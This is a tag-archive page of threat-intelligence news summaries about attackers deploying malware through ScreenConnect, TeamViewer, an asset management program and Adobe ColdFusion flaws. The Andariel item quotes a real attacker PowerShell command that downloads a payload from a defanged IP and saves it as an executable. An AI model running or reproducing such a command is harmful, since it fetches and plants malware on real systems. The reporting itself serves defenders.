Tag Archive for: Deploy

Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware


Mar 05, 2024 | Newsroom | Malware / Cyber Threat

North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK.

According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark.

“The threat actor gained access to the victim workstation by exploiting the exposed setup wizard of the ScreenConnect application,” security researchers Keith Wojcieszek, George Glass, and Dave Truman said.

“They then leveraged their now ‘hands on keyboard’ access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB) based malware.”


The ConnectWise flaws in question are CVE-2024-1708 and CVE-2024-1709, which came to light last month and have since come under heavy exploitation by multiple threat actors to deliver cryptocurrency miners, ransomware, remote access trojans, and stealer malware.

Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer.

BabyShark, first discovered in late 2018, is launched using an HTML Application (HTA) file. Once launched, the VB script malware exfiltrates system information to a command-and-control (C2) server, maintains persistence on the system, and awaits further instruction from the operator.

Then in May 2023, a variant of BabyShark dubbed ReconShark was observed being delivered to specifically targeted individuals through spear-phishing emails. TODDLERSHARK is assessed to be the latest evolution of the same malware due to code and behavioral similarities.

The malware, besides using a scheduled task for persistence, is engineered to capture and exfiltrate sensitive information about the compromised hosts, thereby acting as a valuable reconnaissance tool.

TODDLERSHARK “exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code, and using uniquely generated C2 URLs, which could make this malware hard to detect in…


TeamViewer Exploited to Obtain Remote Access, Deploy Ransomware


The cybersecurity researchers at Huntress have issued a warning about a recent surge in cyber attacks, highlighting a new strategy employed by cybercriminals who are exploiting TeamViewer to deploy LockBit ransomware.

TeamViewer has a history of being abused in large-scale cyber attacks. Once again, cybersecurity experts have observed a surprising surge in cybercriminals’ attempts to exploit TeamViewer, a trusted remote access tool, to deploy LockBit ransomware, potentially exposing users to data encryption and extortion demands.

Researchers claim attackers exploit vulnerabilities in TeamViewer to gain initial access to victim devices and then deploy the aggressive LockBit ransomware, which encrypts critical files and demands substantial ransom payments for decryption.

The infections were either contained or averted, and no ransomware operation has been officially associated with the intrusions, although the payload resembled LockBit ransomware encryptors. It is worth noting that in 2022, the ransomware builder for LockBit 3.0 was leaked, allowing the Bl00dy and Buhti gangs to launch their own campaigns.

For your information, TeamViewer is a popular remote access tool in the enterprise world. Unfortunately, it has been exploited by scammers and ransomware actors to access remote desktops and execute malicious files for years. In March 2016, numerous victims reported their devices being breached via TeamViewer and attempts made to encrypt files with the Surprise ransomware.

Back then, the unauthorized access via TeamViewer was attributed to credential stuffing, where attackers used users’ leaked credentials instead of exploiting a zero-day vulnerability.

The software vendor explained that online criminals often log on with compromised accounts to find corresponding accounts with the same credentials, potentially allowing them to access all assigned devices for malware or ransomware installation.

The latest analysis from Huntress SOC analysts reveals that cybercriminals continue to use old techniques, abusing TeamViewer to take over devices and deploy ransomware. In one of the instances, as observed by Huntress, a single threat actor used TeamViewer to…


Hackers Exploit Asset Management Program to Deploy Malware


The Andariel group has been identified in recent reports as distributing malware through asset management programs. This group has previously been linked to the Lazarus group.

The Andariel group is known to launch supply chain, spear phishing, or watering hole attacks as part of their initial access.

The group’s recent campaigns abused Log4Shell and Innorix agents to attack several corporate sectors in South Korea. In another case, an MS-SQL server was also identified as a target for malware installation.

The malware used for attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. Similar to their previous attacks, their primary targets were South Korean communications companies and semiconductor manufacturers.


Hackers Exploit Asset Management Program

Initial Access

In one case, an asset management program was targeted; the attack was identified through several logs.

The Andariel group’s malware was installed through this program. The malware was downloaded with the PowerShell command below, executed via the mshta.exe process.

PowerShell command used (Source: AhnLab)

PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe

Malware Used in Attacks

The most commonly installed backdoors were TigerRAT, Black RAT, and NukeSped.

However, in recent attacks, an open-source malware named Lilith RAT was used. In other cases, malware developed in the Go language was also discovered.

TigerRAT

This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.

This backdoor performs an authentication process during its initial communications, which sets it apart from other backdoors.

Golang Downloader


Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware


  • Remote attackers can exploit pre-authentication RCE vulnerabilities in Adobe ColdFusion 2021 to seize control of affected systems.
  • Adobe has released security patches to address these vulnerabilities, but attackers are still exploiting them.
  • The attack campaign involves multiple stages, including probing, reverse shells, and the deployment of malware.
  • Four distinct malware strains have been identified: XMRig Miner, Satan DDoS/Lucifer, RudeMiner, and BillGates/Setag backdoor.
  • Users are advised to upgrade their systems promptly and deploy protection mechanisms to thwart ongoing attacks.

Numerous users of both Windows and macOS platforms are currently at risk due to vulnerabilities present in Adobe ColdFusion. This software suite, a popular choice for web application development, recently came under attack as remote attackers discovered and exploited pre-authentication remote code execution (RCE) vulnerabilities. These vulnerabilities grant attackers the ability to seize control of affected systems, which is why they carry a critical severity rating.

These attacks target the WDDX deserialization process within Adobe ColdFusion 2021. While Adobe responded swiftly with security updates (APSB23-40, APSB23-41, and APSB23-47), FortiGuard Labs observed continued exploitation attempts.

An analysis of the attack patterns revealed the sequence of steps the threat actors followed. They initiated probing activities using tools like “interactsh” to test the exploit’s effectiveness. These activities involved multiple domains, including mooo-ngcom, redteamtf, and h4ck4funxyz. The probing phase gave attackers insight into potential vulnerabilities and served as a precursor to more malicious actions.

The attack campaign’s sophistication extended to the use of reverse shells. By encoding payloads in Base64, attackers sought to gain unauthorized access to victim systems, enabling remote control.

Notably, the analysis disclosed a multi-pronged approach, including the deployment of various malware variants. Attacks were launched from distinct IP addresses, raising concerns about the campaign’s widespread reach. Malware payloads were encoded…
